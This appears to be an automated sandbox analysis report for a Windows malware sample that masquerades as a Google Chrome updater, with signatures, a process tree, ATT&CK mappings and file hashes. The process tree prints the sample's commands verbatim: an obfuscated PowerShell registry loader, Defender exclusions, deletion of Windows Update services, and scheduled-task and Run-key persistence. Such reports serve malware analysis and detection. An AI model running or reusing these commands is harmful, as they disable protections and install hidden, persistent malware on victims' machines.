Analysis
-
max time kernel
300s -
max time network
291s -
platform
windows10-1703_x64 -
resource
win10-20230831-en -
resource tags
-
submitted
04-09-2023 00:32
General
-
Target
dmi1dfg7n.exe
-
Size
2.8MB
-
MD5
9253ed091d81e076a3037e12af3dc871
-
SHA1
ec02829a25b3bf57ad061bbe54180d0c99c76981
-
SHA256
78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
-
SHA512
29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
SSDEEP
49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 8 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 8 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 6 IoCs
-
Checks SCSI registry key(s) 3 TTPs 26 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 26 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 49 IoCs
-
Suspicious use of SendNotifyMessage 23 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of UnmapMainImage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6f8d7705-1b8e-42e2-93fc-f3b561263e8f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{d3239665-971c-43db-b93c-f0842792cfa9}2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1196 -s 2765⤵
- Program crash
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3296" "2264" "2412" "2284" "0" "0" "2260" "0" "0" "0" "0" "0"4⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe xtrjicqmdliu3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks system information in the registry
- Detects videocard installed
- Modifies data under HKEY_USERS
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=3⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Enumerates connected drives
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3196 -s 28962⤵
- Program crash
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3948 -s 8882⤵
- Program crash
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3960 -s 7122⤵
- Program crash
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 920 -s 8762⤵
- Program crash
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\System32\mobsync.exeC:\Windows\System32\mobsync.exe -Embedding1⤵
- Modifies registry class
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s W32Time1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4140 -s 7202⤵
- Program crash
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_d933544bb1849471d20420de9b7ea63ee0261f_41822faa_cab_0b60408e\WER2F6A.tmp.appcompat.txtFilesize
6KB
MD5f46275f9c0b7d57378a712b3b5213b0c
SHA1deabdaf020ce95f5f0edec43711719873975b44a
SHA256523bbacd7e59ce4231693d2e486f2c2f551265328c7c8f2b178d3c5a7d2a20ae
SHA5129747d174735fcbbfa8e1957f9b0760db7ffeb563b27e565db4fe54ad74bb83409b3ba5adce5a022fbe0a5b7d17b8ddc9eed231117fd6316e675082e354e7cf54
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER60F0.tmp.csvFilesize
36KB
MD5e7165f30f5eda53e9d028d6aa4d12e71
SHA1703a2daed59860bdc14736acc907a0e543c12b71
SHA256d5a75d2bb46e1b5dddfe8c9dec87f4953fc16c9a0dcdfffb722724bd334c44c7
SHA512962c31ea380c264275bb36290eeafc2ce8352c85ce4263cf4adb27c4be5b5c4dc1057ce795f25c02fed1271fa266f0c9ac82dbed8385aecb5c6cca735af9fd51
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6110.tmp.txtFilesize
12KB
MD57c0f9c994e25fad4e18d15d4aa95df1b
SHA1edf6c9628a280a2ad04e504ab877461cb5dc9f4c
SHA256ea955e0df952c988e299b227fc21fea894bd1aa14c82d22a44470fa747c55782
SHA512dc27ca03f4c60ae30398914f6e637d1910b43ba7f6c7fed017d56a1e682be8d6dd93114c6ea59c68846d903779501e5a84834b18d08842913fcb24f9fbe28bc7
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F2A.tmp.csvFilesize
34KB
MD5c1db28947dca743e673a49c2d291301e
SHA1b4e25b684a2572e2584e82b8de62fe6ac4ec7b42
SHA256a38e393a489cdd7570cc952abbad528f13d1587e54a90b3d016465c0d60e27b0
SHA5123b393f39b0dda5315bddca03f692d6868c18ffc5e2244fd7bb6191d0db4743c6eba3fa260a7e0efb50dffe1249a4f53724b59780d8ad31558789bdeff5e8237f
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F6A.tmp.txtFilesize
12KB
MD55a1798d2837293948fbe10df3498018c
SHA17d94f021162a643ef2c1bd507d28800e96a6ad3d
SHA2563f695205ae5e6bfcd5499d60d496c8220b8a5f9812a4cd11e1a9d7f527008940
SHA512fecc683c3dd88369cbcc28d2e4595991ceb919ef9c949d35acc6f62690c14d320dffa113fb5755a8a6eeddb51094246605def8828cb7725d6d38b0594f993be6
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D41.tmp.csvFilesize
32KB
MD5e6f39d27d00d6264aefd0e1b5e8a9190
SHA1e4353bc4058ae1ce21127f94c7f67de3467f49c2
SHA2563f5c436558e7ed1c22419b5b123c6289fea2c987dc0b44ef35f430f67e8b6bfc
